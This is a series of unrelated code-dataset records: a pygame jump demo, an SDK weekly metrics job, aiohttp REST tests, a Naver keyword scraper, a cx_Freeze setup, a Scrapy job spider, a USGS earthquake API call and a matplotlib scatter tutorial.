\"R\"\r\n\t\r\n\tdef fall_from_jump(self):\r\n\t\tif self.change_y == 0:\r\n\t\t\tself.change_y = 1\r\n\t\telse:\r\n\t\t\tself.change_y += .5\r\n\t\t\r\n\t\tif self.rect.y >= GAME_FLOOR - self.rect.height and self.change_y >= 0:\r\n\t\t\tself.change_y = 0\r\n\t\t\tself.rect.y = GAME_FLOOR - self.rect.height\r\n\t\t\t\r\n\tdef jump(self):\r\n\t\t\t# check player is standing on the floor\r\n\t\t\tif self.rect.bottom >= GAME_FLOOR:\r\n\t\t\t\tself.change_y = -10\r\n\t\t\t\r\n\t# if player stops directing character, then set the amount to change x by to 0\r\n\tdef stop(self):\r\n\t\tself.change_x = 0\r\n\r\n\r\ndef main():\r\n\t# set up initial game environment\r\n\tglobal SCREEN_WIDTH, SCREEN_HEIGHT, BLACK, WHITE, BLUE\r\n\tpygame.init()\r\n\tscreen = pygame.display.set_mode([SCREEN_WIDTH,SCREEN_HEIGHT])\r\n\tpygame.display.set_caption(\"Walk Cycle Test\")\r\n\r\n\t# create player\r\n\tplayer = Player()\r\n\r\n\t# set players initial x-axis position\r\n\tplayer.rect.x = 340\r\n\t# set players initial y-axis position to be at bottom of screen\r\n\tplayer.rect.y = GAME_FLOOR - player.rect.height\r\n\t\r\n\t# create a group to hold our sprites\r\n\tactive_sprite_list = pygame.sprite.Group()\r\n\t# add player sprite to the sprite group\r\n\tactive_sprite_list.add(player)\r\n\r\n\t# set up initial game loop \r\n\tdone = False\r\n\tclock = pygame.time.Clock()\r\n\r\n\t### - MAIN GAME LOOP - ###\r\n\twhile not done:\r\n\t\t# look for user input\r\n\t\tfor event in pygame.event.get():\r\n\t\t\t# exit if user closes window\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tdone = True\r\n\t\t\t\r\n\t\t\t# check to see if a key is pressed down\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\t# if left arrow is pressed, then go left\r\n\t\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\t\tplayer.go_left()\r\n\t\t\t\t# if right arrow is pressed, go right\r\n\t\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\t\tplayer.go_right()\r\n\t\t\t\t# if up arrow is pressed, then jump\r\n\t\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\t\tplayer.jump()\r\n\t\t\t\t\r\n\t\t\t# check for when user releases key\r\n\t\t\tif event.type == pygame.KEYUP:\r\n\t\t\t\t# if the depressed key was the left arrow and the amount to move the\r\n\t\t\t\t# 
player character by is still set to a non zero amount, then stop the player\r\n\t\t\t\t# - this is to prevent the player character from continuing to move after the key is\r\n\t\t\t\t# released.\r\n\t\t\t\tif event.key == pygame.K_LEFT and player.change_x < 0:\r\n\t\t\t\t\tplayer.stop()\r\n\t\t\t\t# same as above but for right arrow\r\n\t\t\t\tif event.key == pygame.K_RIGHT and player.change_x > 0:\r\n\t\t\t\t\tplayer.stop()\r\n\r\n\t\t### Draw current level in buffer ####\r\n\t\tscreen.fill(BLACK)\r\n\t\t### Update Sprite Positions in buffer ###\r\n\t\tactive_sprite_list.update()\r\n\t\t### Draw Sprites ###\r\n\t\tactive_sprite_list.draw(screen)\r\n\r\n\t\t### Set game FPS ###\r\n\t\tclock.tick(60)\r\n\r\n\t\t### Draw buffer to screen ###\r\n\t\tpygame.display.flip()\r\n\t\r\n\t# Main game loop has exited here so we can tidy up and exit.\r\n\tpygame.quit()\r\n\r\nmain()\r\n\t\t\r\n\t\t\r\n", "sub_path": "Projects/Old_2d_scroller_files/platformer_tests/walk_jump.py", "file_name": "walk_jump.py", "file_ext": "py", "file_size_in_byte": 6980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.image.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 146, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 157, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 157, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 197, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 200, "usage_type": "call"}]} {"seq_id": "483545748", "text": "# 
coding=utf-8\n\n# Weekly cumulative user and payment statistics\n# Author:liqianxi\n# Date:2015/03/10\n\nimport os\nimport logging\nimport datetime\n\nfrom pygodzilla.stream_handler import metrics\nfrom pygodzilla.context import Context\n\nfrom pipelines import *\n\n\nlogging.basicConfig(format='%(levelname)s %(asctime)-15s '\n                           '%(filename)s@%(funcName)s:%(message)s',\n                    level=logging.INFO)\n\nos.environ['HADOOP_USER_NAME'] = 'godzilla'\n\n\ndef week_days():\n    return lambda x: (x,\n        x + datetime.timedelta(days=1), x + datetime.timedelta(days=2), x + datetime.timedelta(days=3),\n        x + datetime.timedelta(days=4), x + datetime.timedelta(days=5), x + datetime.timedelta(days=6))\n\n\nctx = Context(\"sdk\", {\n    \"mongo_host\": \"10.0.0.57\",\n    \"mongo_database\": \"godzilla\"\n})\n\n# Users and devices (per app)\nweekly_users_by_app_id = metrics('sdk', reg_or_login_events.with_date(week_days()),\n                                 group_by='appId',\n                                 rules=[\n                                     ('__weekly_users_by_app_id', 'countDistinct(userId)'),\n                                     ('__weekly_devices_by_app_id', 'countDistinct(deviceId)')\n                                 ])\n\n# Active users and active devices (per app)\nweekly_active_users_by_app_id = metrics('sdk', login_events.with_date(week_days()),\n                                        group_by=\"appId\",\n                                        rules=[\n                                            ('__weekly_active_users_by_app_id', 'countDistinct(userId)'),\n                                            ('__weekly_active_devices_by_app_id', 'countDistinct(deviceId)')\n                                        ])\n\n# Paying users (per app)\nweekly_pay_users_by_app_id = metrics('sdk', weekly_pay_users_amounts,\n                                     group_by=\"appId\",\n                                     rules=[\n                                         ('__weekly_pay_users_by_app_id', 'countDistinct(userId)'),\n                                         ('__weekly_pay_real_amount_by_app_id', 'sum(realAmount)')\n                                     ])\n\n# Users and devices\nweekly_users = metrics('sdk', reg_or_login_events.with_date(week_days()),\n                       rules=[\n                           ('__weekly_users', 'countDistinct(userId)'),\n                           ('__weekly_devices', 'countDistinct(deviceId)')\n                       ])\n\n# Active users and active devices\nweekly_active_users = metrics('sdk', login_events.with_date(week_days()),\n                              rules=[\n                                  ('__weekly_active_users', 'countDistinct(userId)'),\n                                  ('__weekly_active_devices', 'countDistinct(deviceId)')\n                              ])\n\n# Paying users\nweekly_pay_users = metrics('sdk', weekly_pay_users_amounts,\n                           rules=[\n                               ('__weekly_pay_users', 'countDistinct(userId)'),\n                               ('__weekly_pay_real_amount', 'sum(realAmount)')\n                           ])\n\nall_metrics = [\n    weekly_users_by_app_id,\n    weekly_active_users_by_app_id,\n    weekly_pay_users_by_app_id,\n    weekly_users,\n    weekly_active_users,\n    weekly_pay_users\n]\n\nctx.add_tasks(all_metrics)\n\nif __name__ == '__main__':\n    ctx.run('weekly')\n", "sub_path": "sdk/weekly.py", "file_name": "weekly.py", "file_ext": "py", "file_size_in_byte": 3389, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.basicConfig", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 27, "usage_type": "call"}, {"api_name": "pygodzilla.context.Context", "line_number": 30, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 36, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 44, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 52, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 60, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 67, "usage_type": "call"}, {"api_name": 
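week_days() in the weekly.py record above turns a start date into a seven-day window. An equivalent, more compact restatement plus a sanity check (dates are illustrative):

import datetime

def week_days():
    # Same 7-tuple as the record's lambda: the start date plus the next six days.
    return lambda x: tuple(x + datetime.timedelta(days=i) for i in range(7))

days = week_days()(datetime.date(2015, 3, 9))
assert days[0] == datetime.date(2015, 3, 9)
assert days[-1] == datetime.date(2015, 3, 15)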
"pygodzilla.stream_handler.metrics", "line_number": 74, "usage_type": "call"}]} {"seq_id": "223990801", "text": "# pylint:disable=unused-import\n# pylint:disable=unused-argument\n# pylint:disable=redefined-outer-name\n\nimport logging\nimport sys\nfrom pathlib import Path\n\nimport openapi_core\nimport pytest\nimport yaml\nfrom aiohttp import web\n\nimport simcore_service_webserver\nfrom servicelib.application_keys import APP_CONFIG_KEY, APP_OPENAPI_SPECS_KEY\nfrom servicelib.rest_responses import unwrap_envelope\nfrom simcore_service_webserver import resources, rest\nfrom simcore_service_webserver.rest import setup_rest\nfrom simcore_service_webserver.security import setup_security\n\nlogging.basicConfig(level=logging.INFO)\n\n\n# TODO: reduce log from openapi_core loggers\n\n@pytest.fixture\ndef openapi_path(api_specs_dir):\n specs_path = api_specs_dir / 'oas3/v0/openapi.yaml'\n assert specs_path.exits()\n return specs_path\n\n@pytest.fixture\ndef spec_dict(openapi_path):\n with openapi_path.open() as f:\n spec_dict = yaml.safe_load(f)\n return spec_dict\n\n@pytest.fixture\ndef client(loop, aiohttp_unused_port, aiohttp_client, api_specs_dir):\n app = web.Application()\n\n server_kwargs={'port': aiohttp_unused_port(), 'host': 'localhost'}\n # fake config\n app[APP_CONFIG_KEY] = {\n \"main\": server_kwargs,\n \"rest\": {\n \"version\": \"v0\",\n \"location\": str(api_specs_dir / \"v0\" / \"openapi.yaml\")\n }\n }\n # activates only security+restAPI sub-modules\n setup_security(app)\n setup_rest(app, debug=True)\n\n cli = loop.run_until_complete( aiohttp_client(app, server_kwargs=server_kwargs) )\n return cli\n\n# ------------------------------------------\n\nasync def test_check_health(client):\n resp = await client.get(\"/v0/\")\n payload = await resp.json()\n\n assert resp.status == 200, str(payload)\n data, error = tuple(payload.get(k) for k in ('data', 'error'))\n\n assert data\n assert not error\n\n assert data['name'] == 'simcore_service_webserver'\n assert data['status'] == 'SERVICE_RUNNING'\n\nasync def test_check_action(client):\n QUERY = 'value'\n ACTION = 'echo'\n FAKE = {\n 'path_value': 'one',\n 'query_value': 'two',\n 'body_value': {\n 'a': 'foo',\n 'b': '45'\n }\n }\n\n resp = await client.post(\"/v0/check/{}?data={}\".format(ACTION, QUERY), json=FAKE)\n payload = await resp.json()\n data, error = tuple(payload.get(k) for k in ('data', 'error'))\n\n assert resp.status == 200, str(payload)\n assert data\n assert not error\n\n # TODO: validate response against specs\n\n assert data['path_value'] == ACTION\n assert data['query_value'] == QUERY\n assert data['body_value'] == FAKE\n\n@pytest.mark.skip(reason=\"DEV: Dummy login\")\nasync def test_auth_register(client, caplog):\n caplog.set_level(logging.ERROR, logger='openapi_spec_validator')\n caplog.set_level(logging.ERROR, logger='openapi_core')\n\n response = await client.post('v0/auth/register',\n json = {\n 'email': 'bar@mail.com',\n 'password': 'my secret',\n 'confirm': 'my secret',\n },\n )\n payload = await response.json()\n\n assert response.status==web.HTTPOk.status_code, str(payload)\n\n data, error = [payload[k] for k in ('data', 'error')]\n assert not error\n assert data\n\n assert 'message' in data\n assert data.get('logger') == \"user\"\n\n # possible usage\n client_log = logging.getLogger(data.get('logger', __name__))\n level = getattr(logging, data.get('level', \"INFO\"))\n client_log.log(level, msg=data['message'])\n\n@pytest.mark.skip(reason=\"DEV: Dummy login\")\nasync def test_auth_login(client, caplog):\n\n 
log_filter = logging.Filter(name='simcore_service_webserver')\n logging.getLogger().addFilter(log_filter)\n\n # valid registration\n response = await client.post('v0/auth/register',\n json = {\n 'email': 'foo@mymail.com',\n 'password': 'my secret',\n 'confirm': 'my secret',\n },\n )\n payload = await response.json()\n assert response.status==200, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert not error\n assert data\n\n # FIXME: routing errors are returned as text and not json!!\n\n # valid login on registered ser\n response = await client.post('v0/auth/login',\n json = {\n 'email': 'foo@mymail.com',\n 'password': 'my secret',\n },\n )\n payload = await response.json()\n assert response.status==200, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert not error\n assert data\n\n\n # invalid login\n response = await client.post('v0/auth/login',\n json = {\n 'email': 'foo@mymail.com',\n 'password': 'wrong pass',\n },\n )\n payload = await response.json()\n assert response.status==web.HTTPUnprocessableEntity.status_code, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert error\n assert not data\n\n\n # logout\n response = await client.get('v0/auth/logout')\n\n payload = await response.json()\n assert response.status==web.HTTPOk.status_code, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert not error\n assert data # logs\n assert all( k in data for k in ('level', 'logger', 'message') )\n\n@pytest.mark.skip(reason=\"SAN: this must be added to ensure easier transition\")\nasync def test_start_pipeline(client):\n\n resp = await client.post(\"/start_pipeline\",\n json={\n \"project_id\":\"asdfsk-sdfsdgsd-sdfsfd-sdfsd\",\n \"workbench\":{\n \"eroiuriet-dsffdgjh-eriter-dfdfg\":{\n\n }\n }\n\n })\n assert resp.status == 200\n\n payload = await resp.json()\n data, error = tuple(payload.get(k) for k in ('data', 'error'))\n\n assert data\n assert not error\n\n assert data['name'] == 'simcore_service_webserver'\n assert data['status'] == 'SERVICE_RUNNING'\n", "sub_path": "services/web/server/tests/unit/test_rest.py", "file_name": "test_rest.py", "file_ext": "py", "file_size_in_byte": 5895, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "attribute"}, {"api_name": "aiohttp.web.Application", "line_number": 40, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 40, "usage_type": "name"}, {"api_name": "servicelib.application_keys.APP_CONFIG_KEY", "line_number": 44, "usage_type": "name"}, {"api_name": "simcore_service_webserver.security.setup_security", "line_number": 52, "usage_type": "call"}, {"api_name": "simcore_service_webserver.rest.setup_rest", "line_number": 53, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 102, "usage_type": "attribute"}, {"api_name": "aiohttp.web.HTTPOk", "line_number": 113, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 113, "usage_type": "name"}, {"api_name": "logging.getLogger", 
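The tests in the test_rest.py record above keep asserting the same data/error envelope convention through unwrap_envelope, whose servicelib implementation is not shown in this record. A minimal stand-in that matches how the tests use it (an assumption, not the real code):

def unwrap_envelope(payload):
    # Every REST response carries {'data': ..., 'error': ...}; at most one is set.
    return payload.get('data'), payload.get('error')

data, error = unwrap_envelope({'data': {'status': 'SERVICE_RUNNING'}, 'error': None})
assert data and not error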
"line_number": 123, "usage_type": "call"}, {"api_name": "pytest.mark.skip", "line_number": 99, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 99, "usage_type": "attribute"}, {"api_name": "logging.Filter", "line_number": 130, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 131, "usage_type": "call"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 144, "usage_type": "call"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 160, "usage_type": "call"}, {"api_name": "aiohttp.web.HTTPUnprocessableEntity", "line_number": 173, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 173, "usage_type": "name"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 175, "usage_type": "call"}, {"api_name": "aiohttp.web.HTTPOk", "line_number": 184, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 184, "usage_type": "name"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 186, "usage_type": "call"}, {"api_name": "pytest.mark.skip", "line_number": 127, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pytest.mark.skip", "line_number": 191, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 191, "usage_type": "attribute"}]} {"seq_id": "328824468", "text": "import requests\nimport json\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nimport threading\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef jsonload() :\n req = requests.get('https://www.naver.com/')\n html = req.text\n soup = BeautifulSoup(html, 'html.parser')\n mysearch = soup.select(\n '.PM_CL_realtimeKeyword_rolling_base > div > ul > li > a > .ah_k'\n )\n data = json.load(open(os.path.join(BASE_DIR, 'result.json'), mode='r+', encoding='utf8'))\n nowstring = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n data[nowstring] = []\n for title in mysearch:\n data[nowstring].append(title.text)\n with open(os.path.join(BASE_DIR, 'result.json'), mode='w+', encoding='utf8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=\"\\t\")\n\ndef main():\n jsonload()\n threading.Timer(10, main).start()\n\nmain()", "sub_path": "parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 881, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}, {"api_name": "threading.Timer", "line_number": 26, "usage_type": "call"}]} {"seq_id": "80999557", "text": "from cx_Freeze import setup, 
Executable\n\ninc=[]\ninc.append(\"sip\")\ninc.append(\"PyQt4.QtCore\")\ninc.append(\"PyQt4.QtGui\")\ninc.append(\"LauePlaneCfg\")\ninc.append(\"StereoCfg\")\n\nopts=dict(includes=inc,\n icon=\"icons/clip.ico\",\n compressed=True,\n base=\"Win32GUI\",\n append_script_to_exe=True,\n optimize=1)\n\n\nsetup(\n name = \"Clip\",\n version = \"3.0c\",\n description = \"The Cologne Laue Indexation Program\",\n executables = [Executable(\"clip.py\")],\n options={\"build_exe\": opts})\n\n", "sub_path": "tags/release-1.0beta3/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 545, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cx_Freeze.setup", "line_number": 18, "usage_type": "call"}, {"api_name": "cx_Freeze.Executable", "line_number": 22, "usage_type": "call"}]} {"seq_id": "359112179", "text": "\"\"\"\nCatenon spider created on the top of ATSSpider\n\nscrapy crawl catenon -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://catenon.com/jobs\"\n\nSample URL:\n http://catenon.com/jobs\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\nfrom urllib import urlencode\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace\n\npattern = {\n 'open_parenthesis': compile(r'([(])'),\n 'close_parenthesis': compile(r'([)])'),\n}\n\n\nclass Catenon(ATSSpider):\n\n name = 'catenon'\n # Taking table header and map to english headers\n mapping_table_headers = {\n 'Position': 'title',\n 'Location': 'location',\n 'Reference': 'ref_id',\n 'Sector': 'jobcategory',\n }\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n logo_url = sel.xpath(\n '//div[contains(@class, \"logo\")]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(\n response.url, logo_url[0].replace('..', '')\n )\n categories = sel.xpath(\n '//div/select[@id=\"areaSearchSelect\"]/option[not(position()=1)]/@value'\n ).extract()\n params = {\n 'idpais': '-1',\n 'idareaCrm': '-1',\n 'idpuestoCrm': '-1',\n 'keywords': '',\n }\n for cat_value in categories:\n params.update({'idareaCrm': str(cat_value)})\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(\n response.url,\n '/jobs/search.action?%s' % urlencode(params)\n )\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n\n table_header = sel.xpath(\n '//table[@id=\"jobs\"]/thead/tr/td/strong/text()'\n ).extract()\n meta_xpaths = {}\n for th in table_header:\n if th in self.mapping_table_headers:\n meta_xpaths[\n self.mapping_table_headers[th]\n ] = './td[%s]//text()' % str(table_header.index(th) + 1)\n for tr in sel.xpath(\n '//table[@id=\"jobs\"]/tbody/tr'\n ):\n job_url = tr.xpath('./td/a/@href').extract()\n if job_url:\n meta_data = {}\n for key, value in meta_xpaths.iteritems():\n meta_data[key] = tr.xpath(value).extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta_data,\n url=urljoin(response.url, job_url[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detalle_oferta\"]/div/h3/text()'\n )\n if not loader.get_output_value('title'):\n loader.add_value(\n 'title', response.meta.get('title')\n )\n loader.add_value(\n 'location',\n 
response.meta.get('location'),\n            Replace(pattern['open_parenthesis'], ', '),\n            Replace(pattern['close_parenthesis'])\n        )\n        loader.add_value(\n            'referencenumber',\n            response.meta.get('ref_id'),\n            Prefix('%s-' % self.name)\n        )\n        loader.add_value('url', response.url)\n        loader.add_xpath(\n            'description',\n            [\n                '//div/h3[contains(text(), \"Functions\")]',\n                '//div/h3[contains(text(), \"Functions\")]/../following-sibling::ul[1]'\n            ]\n        )\n        loader.add_xpath(\n            'requirements',\n            [\n                '//div/h3[contains(text(), \"Requirements\")]',\n                '//div/h3[contains(text(), \"Requirements\")]/../following-sibling::ul[1]'\n            ]\n        )\n        loader.add_value(\n            'jobcategory', response.meta.get('jobcategory')\n        )\n        loader.add_value(\n            'logo_url', self.logo_url\n        )\n        loader.add_value('apply_url', response.url)\n\n        yield loader.load_item()\n", "sub_path": "brightcorp/brightcorp/spiders/catenon.py", "file_name": "catenon.py", "file_ext": "py", "file_size_in_byte": 4351, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "re.compile", "line_number": 21, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 22, "usage_type": "call"}, {"api_name": "brightcorp.base.atsspiders.ATSSpider", "line_number": 26, "usage_type": "name"}, {"api_name": "scrapy.selector.Selector", "line_number": 39, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 44, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 58, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 62, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 67, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 86, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 89, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 96, "usage_type": "call"}, {"api_name": "brightcorp.items.BrightcorpItemLoader", "line_number": 98, "usage_type": "call"}, {"api_name": "brightcorp.processors.Replace", "line_number": 111, "usage_type": "call"}, {"api_name": "brightcorp.processors.Replace", "line_number": 112, "usage_type": "call"}, {"api_name": "brightcorp.processors.Prefix", "line_number": 117, "usage_type": "call"}]} {"seq_id": "226854586", "text": "import datetime as dt\nimport pandas as pd\nimport requests \n\nyesterday = dt.date.today() - dt.timedelta(days=1)\n\napi_url = 'https://earthquake.usgs.gov/fdsnws/event/1/query'\n\napi_args = {\n    'format': 'geojson',\n    'starttime' : yesterday - dt.timedelta(days=30),\n    'endtime' : yesterday\n}\n\nresponse = requests.get(api_url, params=api_args)\nprint(response)\n\nearthquake_json = response.json()\n#print(earthquake_json.keys()) \nprint(earthquake_json['metadata'])\n", "sub_path": "Ch02/ch02_api.py", "file_name": "ch02_api.py", "file_ext": "py", "file_size_in_byte": 462, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "datetime.date.today", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 5, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}]} {"seq_id": "554549333", "text": "''' Plot a scatter chart '''\nimport matplotlib.pyplot as plt\n\ninput_squares 
= list(range(1001))\nsquares = [x**2 for x in input_squares]\n\n''' Plot the points; a pair of x and y coordinate sequences must be passed in '''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c='red') \n# the s argument sets the point size, edgecolors='none' removes the point outlines, c sets the point color\n# Set up a colormap. Usage: pass the data set to c, then add the cmap argument to control how the whole data set is colored\n# plt.cm.Blues colors points with small values light and points with large values dark\n\n''' To learn about all the colormaps in pyplot, visit http://matplotlib.org/, click Examples, scroll down to\n    Color Examples, then click colormaps_reference \n'''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c=squares,cmap=plt.cm.Blues)\n''' Set the chart parameters '''\nplt.title(\"Square Numbers\",fontsize=24) # set the chart title\nplt.xlabel(\"Value\",fontsize=14) # set the x-axis label \nplt.ylabel(\"Square of Value\",fontsize=14) # set the y-axis label\n\n''' Set the size of the tick labels '''\nplt.tick_params(axis='both',which='major',labelsize=14)\n''' Show the scatter chart '''\nplt.show()\n\n''' Save the chart '''\n#plt.savefig('1.png',bbox_inches='tight')\n''' The first argument is the file name to save under; the second trims the surrounding whitespace '''", "sub_path": "matplotlib/example1/c2.py", "file_name": "c2.py", "file_ext": "py", "file_size_in_byte": 1234, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.pyplot.scatter", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}]} {"seq_id": "201307456", "text": "from django.conf import 